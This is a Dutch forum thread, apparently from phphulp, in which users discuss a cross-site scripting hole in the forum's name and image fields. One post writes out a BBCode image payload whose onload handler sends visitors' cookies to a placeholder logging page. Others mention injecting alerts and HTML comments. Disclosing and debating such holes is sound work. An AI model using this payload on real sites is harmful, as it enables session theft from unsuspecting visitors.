input veldjes phphulp

Maar dat word dan niet server side. dan word je eigen PC gek ;)

Mitch schreef op 30.11.2005 14:15

Heb nog een lading koekjes van jullie liggen :+

Dát weet ik nog wel ja :)

wat was er toen?

Mitch had een img plaatje d.m.v een lek een onload attribuut gegeven met een javascriptje naar zijn php pagina die de document.cookie logde van iedereen die erop kwam. Smerig hè?

[img ]http://www.plaatje.nl"; onload="document.location='http://adres.naar/zijn/php/pagina.php?log='+document.cookie[/img ]
zoiets

Hier moet iets aan gedaan worden. Dat wil je gewoon!
Wat nou als iemand een oneindelijk JS Loop in zijn naam zet, of bijvoorbeeld HTML Commentaar <!---
of <b>, dan wordt de hele pagina vern**kt.

zoals mijn naam :P

zal ik er eens een noscript van maken :@:P

Erik schreef op 30.11.2005 14:07

@ sebas

het is zelfs mogelijk een javascript alert op de plaats van je naam te zetten bij instellingen
overal waar je een bericht heb gepost krijg je je zelfgemaakte alert te zien.

Mochten de admins dit topic willen verwijderen om de reden die Martijn geeft, vind ik het prima.

Wat mij betreft mag hij gewoon blijven staan. Dingen in de doofpot stoppen werkt niet bij beveilingslekken. Als het uit de hand loopt, past Bas de code wel aan denk ik.

Van mij ook...

Kleuters die er mee gaan spelen worden wel aan gepakt!

Eris schreef op 01.12.2005 17:36

Kleuters die er mee gaan spelen worden wel aan gepakt!

Als ik <!-- in me naam zet moet je eerst wel de goede kleuter te pakken krijgen